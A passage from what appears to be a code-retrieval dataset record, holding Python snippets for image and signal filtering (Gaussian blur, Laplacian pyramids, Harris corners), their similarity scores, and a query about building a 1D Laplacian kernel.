\tQ_c[-4:] = [0., 0., 0., 0.]\n \tQ_c_frag[-4:] = [0., 0., 0., 0.]\n return Q_c, Q_c_frag, P, range_params", "def filterStatistical(image_object, filter_type=\"prewitt\", sigma=1):\n image_array = sitk.GetArrayFromImage(image_object)\n\n filters = {\"prewitt\": ndimage.prewitt, \"sobel\": ndimage.sobel, \n \"laplace\": ndimage.laplace, \"LoG\": ndimage.gaussian_laplace}\n\n filter_func = filters[filter_type]\n if filter_type == \"LoG\":\n image_filt_object = sitk.GetImageFromArray(filter_func(image_array, sigma))\n else: \n image_filt_object = sitk.GetImageFromArray(filter_func(image_array))\n return image_filt_object", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def get_gaussian_high_pass_filter(self, shape, cutoff):\n\n #Hint: May be one can use the low pass filter function to get a high pass mask\n from numpy import exp\n mask = zeros(shape)\n row_size, col_size = shape[0], shape[1]\n center_row, center_col = row_size/2 , col_size/2\n for r in range(0, row_size):\n for c in range(0, col_size):\n freq_dist = sqrt( (r-center_row)**2 + (c-center_col)**2 )\n mask[r,c] = 1 - (exp(-(freq_dist**2)/(cutoff*2)**2)) if r < cutoff else 1.0\n\n return mask", "def _initial_blur(self):\n if self.init_sigma > self.cur_sigma:\n sigma = sqrt(self.init_sigma * self.init_sigma - self.cur_sigma * self.cur_sigma)\n self.data = gaussian_filter(self.raw, sigma)\n else:\n self.data = self.raw", "def filter_low_pass(x, filt_data, cutoff, fs, order=1, rows=[0,-1]):\n\n from scipy.signal import butter, filtfilt\n import numpy as np\n import matplotlib.pyplot as plt \n\n def butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a \n\n b, a = butter_lowpass(cutoff, fs, order=order)\n \n slice_exp = filt_data[rows[0]:rows[1]]\n lp_slice_exp = filtfilt(b, a, slice_exp)\n lp = np.append(filt_data[:rows[0]],lp_slice_exp)\n lp = np.append(lp,filt_data[rows[1]:])\n\n f, ax = plt.subplots(1,1,figsize=(8,8))\n ax.plot(x,filt_data,'k',label='original data')\n ax.plot(x,lp,'r',label='filtered data')\n ax.legend(loc='best')\n\n return lp", "def filter(self, data):\n self.data = pysap.Image(data=self.flt.filter(data))", "def _filtering(cls, signal, system):\r\n\r\n if np.iscomplexobj(signal):\r\n _, filtered_signal_r, _ = sc_sig.dlsim(system, np.real(signal))\r\n _, filtered_signal_i, _ = sc_sig.dlsim(system, np.imag(signal))\r\n filtered_signal = filtered_signal_r + 1j * filtered_signal_i\r\n else:\r\n _, filtered_signal, _ = sc_sig.dlsim(system, signal)\r\n filtered_signal.shape = signal.shape\r\n return filtered_signal", "def gaussianBlur(img,ksize=(5,5),sigma=10):\n #kernel = cv2.getGaussianKernel(ksize,sigma)\n dst = np.zeros_like(img)\n cv2.GaussianBlur(src=img,dst=dst,ksize=ksize,sigmaX=0)\n return dst", "def filter_image(img):\n return cv2.bilateralFilter(img, 9, 50, 50)", "def low_high_filter(image, param=1.6):\r\n nan_pos = np.isnan(image)\r\n img = image.copy()\r\n mean = np.nanmean(img)\r\n img[nan_pos] = mean\r\n\r\n low_filtered_image = gaussian(img, sigma = 4)\r\n gau = gaussian(img, sigma = 4/param)\r\n high_filtered_image = gau - low_filtered_image\r\n\r\n low_filtered_image[nan_pos] = np.nan\r\n high_filtered_image[nan_pos] = np.nan\r\n return low_filtered_image, high_filtered_image", "def harris(image, threshold = 100000000, sigma = 1.5, k = 0.04):\n\n corners = []\n\n # Calculate gradients:\n X2 = [[0] * image.size[0] for y in xrange(image.size[1])]\n Y2 = [[0] * image.size[0] for y in xrange(image.size[1])]\n XY = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n X = image.getpixel((x + 1, y)) - image.getpixel((x - 1, y))\n Y = image.getpixel((x, y + 1)) - image.getpixel((x, y - 1))\n\n X2[y][x] = X * X\n Y2[y][x] = Y * Y\n XY[y][x] = X * Y\n\n # Gaussian 3x3:\n G = [[0,0,0], [0,0,0], [0,0,0]]\n for y in xrange(3):\n for x in xrange(3):\n u, v = x-1, y-1\n G[y][x] = (math.exp(-(u*u + v*v)/(2*sigma*sigma)))\n\n # Convolve with Gaussian 3x3:\n A = [[0] * image.size[0] for y in xrange(image.size[1])]\n B = [[0] * image.size[0] for y in xrange(image.size[1])]\n C = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n for i in xrange(3):\n for j in xrange(3):\n u, v = j-1, i-1\n A[y][x] = A[y][x] + X2[y + v][x + u] * G[i][j]\n B[y][x] = B[y][x] + Y2[y + v][x + u] * G[i][j]\n C[y][x] = C[y][x] + XY[y + v][x + u] * G[i][j]\n del X2, Y2, XY\n\n # Harris Response Function:\n R = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(image.size[1]):\n for x in xrange(image.size[0]):\n a, b, c = A[y][x], B[y][x], C[y][x]\n Tr = a + b\n Det = a * b - c * c\n R[y][x] = Det - k * Tr * Tr\n del A, B, C\n\n # Suppress Non-Maximum Points:\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n maximum = True\n for dy in (-1, 0, 1):\n for dx in (-1, 0, 1):\n if R[y][x] < R[y + dy][x + dx]:\n maximum = False \n if maximum and R[y][x] > threshold:\n corners.append((x, y))\n \n return corners", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def gauss_convolution(im_array, n_fwhm, fwhm) :\n \n sigma = fwhm / (2.*math.sqrt(2.*math.log(2.)))\n\t\n im_kernel_array = gauss_kernel(n_fwhm, sigma)\n conv_image = signal.convolve(im_array,im_kernel_array,mode = 'same')\n\n return (conv_image)", "def anisotropic_Gaussian(ksize=15, theta=np.pi, l1=6, l2=6):\n\n v = np.dot(np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]), np.array([1., 0.]))\n V = np.array([[v[0], v[1]], [v[1], -v[0]]])\n D = np.array([[l1, 0], [0, l2]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gaussian_filter(shape=(3,3),sigma=0.5):\n m,n = [(ss-1.)/2. for ss in shape]\n y,x = np.ogrid[-m:m+1,-n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def uneven_illumination(image_filt, image, blur_radius):\n #Blur the image\n im_blur = skimage.filters.gaussian(image_filt, blur_radius)\n #Convert the original phase contrast image to a float\n im_float = skimage.img_as_float(image_filt)\n #Subtract the blurred image from the original image to correct for uneven illumination\n image_sub = im_float - im_blur\n return image_sub", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def gaussian_blur(img, kernel=(3, 3)):\n out = cv2.GaussianBlur(img, kernel, 0)\n return out", "def filtering(image):\n output = np.array(image)\n for x in xrange(0,1):\n bilateralFilter_img = cv2.bilateralFilter(output,5, 75, 75)\n\n return bilateralFilter_img", "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def find_difference_of_gaussian_blur(image, k1, k2, *args, **kwargs):\n # TODO: Implement the method\n \n res1 = snf.gaussian_filter(image, k1)\n res2 = snf.gaussian_filter(image, k2)\n res = res2 - res1\n minn = num.amin(res)\n maxx = num.amax(res)\n if(minn - maxx != 0):\n res = (res-minn)/(maxx-minn)\n\n return res", "def __call__( self, X, Y, Z):\n xb,yb,zb = self.transform( X,Y,Z)\n \n gauss = beam( xb,yb,zb, self.w[0], self.w[1], self.l)\n intensity = (2/np.pi)* self.mW/1000. /self.w[0]/self.w[1] *gauss # W um^-2\n \n return uL(self.l)*intensity", "def _FWHMGauss(sigma, pixel=12):\n return sigma*2*np.sqrt(2*np.log(2))*pixel", "def Blur(image):\n\n return cv2.GaussianBlur(image,(7,7),0)", "def cs4243_lap_pyramid(gauss_pyramid):\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n ## your code here####\n \n for i in range(n-1, 0, -1):\n upsampled_image = cs4243_upsample(gauss_pyramid[i], 2)\n expanded_image = (cs4243_filter_faster(upsampled_image, kernel)) * 4\n residual = gauss_pyramid[i-1] - expanded_image\n lap_pyramid.append(residual) \n \n ##\n \n return lap_pyramid", "def kernel_gaussiano(image: np.ndarray, sigma: float, kind: str = 'low') -> np.ndarray:\n U, V = fourier_meshgrid(image)\n D = fourier_distance(U, V)\n H = np.exp( (-1.0 * D) / (2.0 * sigma**2) )\n \n if kind == 'high' or kind == 'highpass':\n H = 1.0 - H\n \n return H", "def hover_to_inst(grad_gauss_filter: int = 7, grad_thresh: float = 0.4) -> \\\n Callable[[Tensor, Tensor], Tensor]:\n assert 0 <= grad_thresh < 1\n assert grad_gauss_filter % 2 == 1\n\n def process(np: Tensor, hv: Tensor) -> Tensor:\n \"\"\"Process function\"\"\"\n np_p = np.detach()\n h_raw = hv[:, :1].detach()\n v_raw = hv[:, 1:].detach()\n\n np_p[np_p >= 0.5] = 1\n np_p[np_p < 0.5] = 0\n\n h = batch_min_max(h_raw)\n v = batch_min_max(v_raw)\n\n s = sobel(grad_gauss_filter).to(np.device)\n\n sobel_h = torch.conv2d(h, s[None, None, ...])\n sobel_h = pad(sobel_h, [grad_gauss_filter // 2] * 4, 'replicate')\n sobel_v = torch.conv2d(v, s.T[None, None, ...])\n sobel_v = pad(sobel_v, [grad_gauss_filter // 2] * 4, 'replicate')\n\n sobel_h = 1 - batch_min_max(sobel_h)\n sobel_v = 1 - batch_min_max(sobel_v)\n\n overall = torch.max(sobel_h, sobel_v)\n overall = overall - (1 - np_p)\n overall[overall < 0] = 0\n\n energy = -(1.0 - overall) * np_p\n energy = kornia.filters.gaussian_blur2d(energy, (3, 3), sigma=(1, 1))\n energy = energy.cpu().numpy()\n\n overall = 1.0 * (overall >= grad_thresh)\n\n m = np_p - overall\n m[m < 0] = 0\n m = m.cpu().numpy()\n np_p = np_p.cpu().numpy()\n\n inst_map = []\n for i in range(np_p.shape[0]):\n m_i = binary_fill_holes(m[i][0]).astype('uint8')\n m_i = remove_small_objects(m_i > 0, 10)\n m_i = measurements.label(m_i)[0]\n w = watershed(energy[i][0], m_i, mask=np_p[i][0])\n inst_map.append(w)\n inst_map = numpy.stack(inst_map)[:, None]\n return torch.tensor(inst_map, device=np.device)\n\n return process", "def enhance(img, window=30):\n hp = highPassFilter(img, window=window)\n tmp = grayscale(img) + laplacian(img)\n return tmp", "def gaussianBlurring(frame):\n return cv2.GaussianBlur(frame, ksize =(11, 11), sigmaX = 0)", "def _apply_image_filters(self, image, filters=[]):\n derivative = image\n for filter in filters:\n derivative = filter(derivative)\n return derivative", "def harris(image, threshold=100000000, sigma=1.5, k=0.04) -> list:\n\n harris_corners = []\n width, height = image.shape[:2]\n\n # Calculate gradients:\n X2 = [[0] * width for y in range(height)]\n Y2 = [[0] * width for y in range(height)]\n XY = [[0] * width for y in range(height)]\n\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n X = int(image[x + 1, y]) - int(image[x - 1, y])\n Y = int(image[x, y + 1]) - int(image[x, y - 1])\n\n X2[y][x] = int(X * X)\n Y2[y][x] = int(Y * Y)\n XY[y][x] = int(X * Y)\n\n # Gaussian 3x3:\n G = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n for y in range(3):\n for x in range(3):\n u, v = x - 1, y - 1\n G[y][x] = (math.exp(-(u * u + v * v) / (2 * sigma * sigma)))\n\n # Convolve with Gaussian 3x3:\n A = [[0] * width for y in range(height)]\n B = [[0] * width for y in range(height)]\n C = [[0] * width for y in range(height)]\n\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n for i in range(3):\n for j in range(3):\n u, v = j - 1, i - 1\n A[y][x] = A[y][x] + X2[y + v][x + u] * G[i][j]\n B[y][x] = B[y][x] + Y2[y + v][x + u] * G[i][j]\n C[y][x] = C[y][x] + XY[y + v][x + u] * G[i][j]\n del X2, Y2, XY\n\n # Harris Response Function:\n R = [[0] * width for y in range(height)]\n for y in range(height):\n for x in range(width):\n a, b, c = A[y][x], B[y][x], C[y][x]\n Tr = a + b\n Det = a * b - c * c\n R[y][x] = Det - k * Tr * Tr\n del A, B, C\n\n # Suppress Non-Maximum Points:\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n maximum = True\n for dy in (-1, 0, 1):\n for dx in (-1, 0, 1):\n if R[y][x] < R[y + dy][x + dx]:\n maximum = False\n if maximum and R[y][x] > threshold:\n harris_corners.append((x, y))\n\n return harris_corners", "def dogonvole(image, psf, kernel=(2., 2., 0.), blur=(1.3, 1.3, 0.), niter=10):\n global hot_pixels\n if not psf.sum() == 1.:\n raise ValueError(\"psf must be normalized so it sums to 1\")\n image = image.astype('float32')\n imin = image.min()\n for y, x in hot_pixels:\n image[y, x] = imin;\n \n img_bg = ndimage.gaussian_filter(image, kernel[:len(image.shape)])\n image = numpy.subtract(image, img_bg)\n numpy.place(image, image<0, 1./2**16)\n image = image.astype('uint16')\n if len(image.shape)==3:\n for i in range(image.shape[2]):\n image[:,:,i] = restoration.richardson_lucy(image[:,:,i], psf,\n niter, clip=False)\n elif len(image.shape)==2:\n image = restoration.richardson_lucy(image, psf, niter, clip=False)\n else:\n raise ValueError('image is not a supported dimensionality.')\n image = ndimage.gaussian_filter(image, blur[:len(image.shape)])\n return image", "def build_gaussian_pyramid(im, max_levels, filter_size):\n filter_vec = create_gaussian_line(filter_size)\n # creating duplicate for confy use\n temp_im = im\n pyr = [im]\n kernel = np.array([0.0625,0.25,0.375,0.25,0.0625])\n kernel = kernel.reshape((1,5))\n for i in range(max_levels - 1):\n # blurring the cur layer\n #temp_im_temp = cv2.filter2D(temp_im,-1,kernel,borderType=cv2.B)\n temp_im = scipy.signal.convolve2d(temp_im, filter_vec, mode='same')\n temp_im = scipy.signal.convolve2d(temp_im, np.transpose(filter_vec), mode='same')\n # sampling only every 2nd row and column\n temp_im = temp_im[::2, ::2]\n pyr.append(temp_im)\n\n return pyr, filter_vec" ]
[ "0.66963106", "0.65597415", "0.6478427", "0.636755", "0.6351325", "0.6253081", "0.62316626", "0.62082386", "0.617469", "0.61242366", "0.6101194", "0.6060973", "0.60049284", "0.600304", "0.60001606", "0.59720194", "0.59712464", "0.59702766", "0.5951012", "0.59331256", "0.59309727", "0.5925999", "0.58940524", "0.5878495", "0.58722365", "0.58685625", "0.58397216", "0.58289784", "0.58256596", "0.5819684", "0.5814094", "0.58098644", "0.5807658", "0.5797674", "0.57975197", "0.5796864", "0.5788471", "0.5788231", "0.5783615", "0.5765069", "0.5757359", "0.57506895", "0.5750514", "0.5745571", "0.5745537", "0.573567", "0.57223547", "0.5710077", "0.57085717", "0.57059807", "0.5702267", "0.5689001", "0.5684689", "0.56837064", "0.5675816", "0.56583875", "0.5654347", "0.56541693", "0.56536496", "0.5650384", "0.56479", "0.564008", "0.56330293", "0.5630014", "0.56244475", "0.5622842", "0.5620645", "0.5619788", "0.5611597", "0.5609136", "0.5608484", "0.56005883", "0.5599589", "0.55917853", "0.5574704", "0.55713505", "0.5544063", "0.55411696", "0.5538797", "0.5538328", "0.5536138", "0.55295634", "0.5525381", "0.55213195", "0.5504092", "0.5503005", "0.5489112", "0.54731286", "0.5469995", "0.54653287", "0.5456722", "0.54555476", "0.5452002", "0.5449253", "0.54447347", "0.54438406", "0.5443021", "0.5441252", "0.5438231", "0.5420859", "0.54066914" ]
0.0
-1
r"""Function that returns the coefficients of a 1D Laplacian filter
def get_laplacian_kernel(kernel_size: int) -> torch.Tensor: if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \ kernel_size <= 0: raise TypeError("ksize must be an odd positive integer. Got {}" .format(kernel_size)) window_1d: torch.Tensor = laplacian_1d(kernel_size) return window_1d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def slip_to_coefficients(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n coefficients = np.linalg.inv(partials) @ y\n return coefficients", "def L(C1s,C0s,ks,bs,sigma=1):\n # return jnp.linalg.det(FIM(q,ps,C1s,C0s,ks,bs,sigma))\n return lambda q,ps:jnp.trace(jnp.linalg.inv(FIM(C1s,C0s,ks,bs,sigma)(q,ps)))", "def laplacian_to_image(lpyr, filter_vec, coeff):\n #TODO check size\n size_list = len(lpyr)\n for i in range(size_list):\n lpyr[i] *= coeff[i]\n\n resIm = lpyr[size_list-1]\n for i in range(size_list- 1,0,-1):\n resIm = expand_im(resIm,filter_vec)\n resIm += lpyr[i-1]\n\n return resIm", "def c_coefficients(x1,x2,x3,y1,y2,y3,initial_slope,final_slope):\n\tC = c_matrix(x1,x2,x3)\n\ty = y_vector(x1,x2,x3,y1,y2,y3,initial_slope,final_slope)\n\tCCoefficients = np.dot(inv(C),y)\n\treturn(CCoefficients)", "def compute_filter_ips_self(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f, f, spec_corr, psd) for f in lal_filters])", "def lfilter(pro, coeffs, axis, zi=None):\n\n b, a = coeffs\n\n # set initial conditions of the filters output\n shape = list(pro.shape)\n shape[axis] = int(max(len(b), len(a)) - 1)\n z = np.zeros(shape) if zi is None else zi\n\n # compute filter values & store current initial conditions\n for subarr in pro:\n \n y, z = sps.lfilter(b, a, subarr, axis=axis, zi=z)\n yield y", "def ben_coeffs(lin_coeffs):\n ben_cor = np.zeros(lin_coeffs.shape[0])\n ben_cor[1] = 1.0\n\n return ben_cor", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def ForwardFactory(self,coeffs):\n a1,a2,a3,A0,E0,G0,n = coeffs\n def forward_lorentzian(evalpts):\n \"\"\"a lorentzian peak over a 1D numpy array\nwith (a1,a2,a3,A0,E0,G0,n) = (%s,%s,%s,%s,%s,%s,%s)\"\"\" % (a1,a2,a3,A0,E0,G0,n)\n return self.evaluate((a1,a2,a3,A0,E0,G0,n),evalpts)\n return forward_lorentzian", "def getNormLaplacian(W):\n\td=[np.sum(row) for row in W]\n\tD=np.diag(d)\n\tL=D-W\n\t#Dn=D^(-1/2)\n\tDn=np.power(np.linalg.matrix_power(D,-1),0.5)\n\tLbar=np.dot(np.dot(Dn,L),Dn)\n\treturn Lbar", "def forward(self, x):\n x = torch.matmul(self.laplacian, x)\n dims = tuple(range(x.ndimension())[1:])\n x = x.pow(2).sum(dims)\n return x", "def laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor:\n return Laplacian(kernel_size)(src)", "def coefficients(self) :\n raise NotImplementedError", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def compute_mesh_laplacian(mesh, weights=None, fem_b=None, lap_type=\"conformal\"):\n print(\" Computing Laplacian\")\n if weights is None:\n (weights, fem_b) = compute_mesh_weights(mesh, weight_type=lap_type)\n\n if lap_type == \"fem\":\n weights.data = weights.data / 2\n\n N = weights.shape[0]\n sB = fem_b.sum(axis=0)\n diaB = sparse.dia_matrix((sB, 0), shape=(N, N))\n B = sparse.lil_matrix(diaB + fem_b)\n s = weights.sum(axis=0)\n dia = sparse.dia_matrix((s, 0), shape=(N, N))\n L = sparse.lil_matrix(dia - weights)\n\n # if symmetrize == 1 & & normalize == 0\n # L = diag(sum(W, 2)) - W;\n # elseif\n # symmetrize == 1 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1 / 2)) * W * diag(\n # sum(W, 2). ^ (-1 / 2));\n # elseif\n # symmetrize == 0 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1)) * W;\n\n li = np.hstack(L.data)\n print(\" -nb Nan in Laplacian : \", len(np.where(np.isnan(li))[0]))\n print(\" -nb Inf in Laplacian : \", len(np.where(np.isinf(li))[0]))\n\n return L, B", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def coefficients(k, xi, x):\n\n import pyweno.cnonuniform\n\n x = np.asarray(x, np.float64)\n xi = np.asarray(xi, np.float64)\n\n nc = len(x) - 1\n n = len(xi)\n c = np.zeros((nc, n, k, k), np.float64)\n beta = np.zeros((nc, k, k, k), np.float64)\n varpi = np.zeros((nc, n, k), np.float64)\n\n pyweno.cnonuniform.nonuniform_coeffs(k, xi, x, c, beta, varpi)\n\n return c, beta, varpi", "def coefC(x0,y0,x1,y1):\n return (x1*y0-x0*y1)/(x1-x0)", "def lfilter_zi(b, a):\n\n # FIXME: Can this function be replaced with an appropriate\n # use of lfiltic? For example, when b,a = butter(N,Wn),\n # lfiltic(b, a, y=numpy.ones_like(a), x=numpy.ones_like(b)).\n #\n\n # We could use scipy.signal.normalize, but it uses warnings in\n # cases where a ValueError is more appropriate, and it allows\n # b to be 2D.\n b = np.atleast_1d(b)\n if b.ndim != 1:\n raise ValueError(\"Numerator b must be 1-D.\")\n a = np.atleast_1d(a)\n if a.ndim != 1:\n raise ValueError(\"Denominator a must be 1-D.\")\n\n while len(a) > 1 and a[0] == 0.0:\n a = a[1:]\n if a.size < 1:\n raise ValueError(\"There must be at least one nonzero `a` coefficient.\")\n\n if a[0] != 1.0:\n # Normalize the coefficients so a[0] == 1.\n b = b / a[0]\n a = a / a[0]\n\n n = max(len(a), len(b))\n\n # Pad a or b with zeros so they are the same length.\n if len(a) < n:\n a = np.r_[a, np.zeros(n - len(a))]\n elif len(b) < n:\n b = np.r_[b, np.zeros(n - len(b))]\n\n IminusA = np.eye(n - 1) - companion(a).T\n B = b[1:] - a[1:] * b[0]\n # Solve zi = A*zi + B\n zi = np.linalg.solve(IminusA, B)\n\n # For future reference: we could also use the following\n # explicit formulas to solve the linear system:\n #\n # zi = np.zeros(n - 1)\n # zi[0] = B.sum() / IminusA[:,0].sum()\n # asum = 1.0\n # csum = 0.0\n # for k in range(1,n-1):\n # asum += a[k]\n # csum += b[k] - a[k]*b[0]\n # zi[k] = asum*zi[0] - csum\n\n return zi", "def one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def convex_conj(self):\n return KullbackLeibler(self.domain, self.prior)", "def get_coeffs(b, q0, hL, g):\n\n C0 = q0 * q0 / (2. * g)\n C1 = b - C0 / (hL * hL) - hL\n\n return C0, C1", "def pchip_coeffs_1(X, Y):\n\n # Find k = index to first valid data site, and\n # K such that K - 1 = index to last valid data site in contiguous range\n # of valid data after index k.\n k, K = valid_range_1_two(X, Y)\n\n return _pchip_coeffs_1(X, Y, k, K)", "def get_l(GW_glitch,i,j):\n\t\t \n\ttemp = np.einsum('nmk,nmk->k', GW_glitch.r_outer_r[:,:,i,j,:], GW_glitch.Hij[:,:,i,j,:])\n\t\t \n\treturn temp", "def lanczos(dx, width, cutoff, /):\n # Coefficients and initial stuff\n # n = (width/dx)//1 # convert window width from 'time units' to 'steps'\n # n = width//2\n # Convert alpha to wavenumber (new units are 'inverse timesteps')\n alpha = 1.0 / (cutoff / dx)\n n = width\n n = (n - 1) // 2 + 1\n tau = np.arange(1, n + 1) # lag time\n C0 = 2 * alpha # integral of cutoff-response function is alpha*pi/pi\n Ck = np.sin(2 * np.pi * alpha * tau) / (np.pi * tau)\n Cktilde = Ck * np.sin(np.pi * tau / n) / (np.pi * tau / n)\n\n # Return filter\n # Example: n = 9 returns 4 + 4 + 1 points\n order = n * 2 - 1\n print(f'Order-{order} Lanczos window')\n window = np.concatenate((np.flipud(Cktilde), np.array([C0]), Cktilde))\n return window[1:-1], 1", "def laplacian_1d(window_size) -> torch.Tensor:\n\n filter_1d = torch.ones(window_size)\n filter_1d[window_size // 2] = 1 - window_size\n laplacian_1d: torch.Tensor = filter_1d\n return laplacian_1d", "def lowpass1(y, dt, fc=3) :\r\n tau=1/(2*np.pi*fc)\r\n alpha=dt/(tau+dt)\r\n y_filt=np.zeros(y.shape)\r\n y_filt[0]=y[0]\r\n for i in np.arange(1,len(y)):\r\n y_filt[i]=alpha*y[i] + (1-alpha)*y_filt[i-1]\r\n return y_filt", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def get_coefficients(poles):\n\n poles = np.array(poles)\n s = sp.symbols('s')\n poly = 1\n for s_i in poles:\n poly = (s - s_i) * poly\n poly = poly.expand()\n\n # calculate the coefficient of characteristic polynomial\n n = len(poles)\n p = []\n for i in range(n):\n p.append(poly.subs([(s, 0)]))\n poly = poly - p[i]\n poly = poly / s\n poly = poly.expand()\n\n # convert numbers and complex objects from multiplication to a complex number\n p = [complex(x) for x in p]\n # if imaginary part if greater than the boundary, then set imaginary part null\n boundary = 1e-12\n for idx, val in enumerate(p):\n val = complex(val)\n if abs(val.imag) > boundary:\n msg = \"Imaginary Part of the coefficient p[\" + \\\n str(idx) + \"] is not null (\" + str(val.imag) + \") for a given boundary of \" + \\\n str(boundary)\n warnings.warn(msg)\n p[idx] = val.real\n\n return np.array([p], dtype=float)", "def linconv(nx):", "def normalized_laplacian(degree_vector, weight_matrix, length):\n holders = np.zeros((length, 1))\n holders[:, 0] = 1 / degree_vector\n\n return np.eye(length) - holders * weight_matrix", "def laplacian(W, normalized=True):\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n 